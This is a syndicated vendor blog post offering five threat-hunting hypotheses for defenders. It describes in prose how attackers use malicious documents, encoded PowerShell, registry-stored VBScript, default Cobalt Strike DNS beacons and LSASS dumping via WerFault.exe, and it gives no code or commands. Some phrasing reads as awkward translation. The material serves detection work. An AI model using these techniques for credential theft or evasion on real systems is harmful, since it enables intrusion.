Database examples

Examples of Threat Hunting Hypotheses: Five Hunts to Start


Structured threat hunting (often called hypothesis-based hunting) remains one of the best ways for organizations to find previously undetected threats in their environment. It works so well because it structures the hunt around a central proposition, and at the end of the hunt, hunt teams can tell, with a high degree of certainty, if their organization has been impacted by an adversary, behavior or technique. Despite this, hunters often struggle to guess a hypothesis and build a hunt around it. As a result, we’ve put together a list of the best examples of startup threat-hunting hypotheses that teams can put into practice right away.

What is a hunting hypothesis?

Before diving into the list, we must first answer the question “what is a threat hunting hypothesis?”

A hypothesis is a “…provisional hypothesis made in order to derive and test its logical or empirical consequences”. Therefore, a threat hunting hypothesis is quite similar in that it is a proposition about a tactic, technique, or procedure, often derived from threat intelligence, security research, or the experience or intuition of an individual hunter, which is then provisionally assumed to be correct until a hunt can be carried out to conclusively prove or disprove its validity.

Although there is no set “format” for a threat hunting hypothesis, many hunters will try to maintain a standard format for their hunts. As you scroll through the top 5 list, you can click on the button associated with the Threat Hunting Hypothesis to see the hunt in HUNTER. If you don’t have a HUNTER account yet, get your free account here and use the promo code “HUNTHYPOTHESIS”.

Threat Hunting Hypothesis #1 – Potential Maldoc Execution Chain

Difficulty level: Easy

Hypothesis: Maldocs (Malware Documents) are malicious documents that contain self-executing code or code that requires a user to grant permission or interact with the document before executing it. Maldocs are mostly delivered to users via phishing emails. In many cases, the user will need to interact with the document before any code will execute successfully. Once the document is opened and any required user interaction is performed, malicious code runs, such as PowerShell, cmd shell, or similar script code to establish communication with the attacker’s infrastructure, download a payload, or perform local actions such as persist or sleep until later.

Threat Hunting Hypothesis #2 – Executing Coded PowerShell Commands

Difficulty level: Easy

Hypothesis: Once a moderately skilled attacker has gained initial access to a system, they are likely to use tools that reside on the system to carry out their attack, or use them as a means of entry for others. tools. This is because these native tools are less likely to be detected by traditional treat detection platforms, and their use is unlikely to garner much attention. This is especially true for tools like PowerShell that allow an attacker to perform a number of attacks. In an effort to further obfuscate their PowerShell activity, attackers will likely use the EncodedCommand function to encode commands and arguments and prevent simple string matching. The presence of the EncodedCommand PowerShell tool should be investigated.

Threat Hunting Hypothesis #3 – Attempting VBScript stored in CurrentVersion registry key value not executed

Level of complexity: Medium

The Windows Registry is a database of settings used by Microsoft Windows system applications and basic utilities. The registry is often abused by adversaries to store configuration information, hide code, evade detection, inhibit system operation, establish persistence, among other reasons. The “CurrentVersion” registry key in the HKCU (Current User) or HKLM (Local Machine) hives is one of the most used registry keys, specifically the Run key in CurrentVersion. Because of this, the Run key is closely monitored by detection and prevention tools. The technique targeted in this package only uses the CurrentVersion key to add malware configuration information and potentially establish persistence. This is probably due to the scrutiny of the Run key by defense tools.

Threat Hunting Hypothesis #4 – Default Cobalt Strike Beacon Structure C2

Level of complexity: Medium

Cobalt Strike is a comprehensive, commercially available penetration testing tool offered by Strategic Cyber ​​LLC, based in Washington, DC. The tool is advertised for “Adversary Simulations and Red Team Ops”, but its significant customization and capabilities have led to its use by a wide variety of threat actors for a variety of motivations. Opponents employing Cobalt Strike will often use its Beacon component when attempting to gain initial access. The beacon component, by default, uses a default command and control (C2) structure through DNS queries. Opponents unfamiliar with Cobalt Strike may neglect to customize the C2 structure.

Threat Hunting Hypothesis #5 – Dumping LSASS memory using WerFault.exe

Level of complexity: Medium

The Local Security Authority Subsystem Service (LSASS) is a process within Windows operating systems that is responsible for enforcing various security policies on a system, including verifying user logins. users. Once a user logs on to the system, it generates and stores credentials in the memory of the lsass.exe process. These credentials can be obtained by adversaries through various means, such as creating a core dump of the process, which can then be used to perform lateral movement, privilege escalation, and various other attack methodologies.


Did you like these hypotheses? Access dozens more by signing up for a HUNTER account today. Get your free account here and use promo code ‘HUNTHYPOTHESIS’.

The post Examples of Threat Hunting Hypotheses: Five Hunts to Start appeared first on Cyborg Security.

*** This is a syndicated blog from Cyborg Security’s Security Bloggers Network written by Josh Campbell. Read the original post at: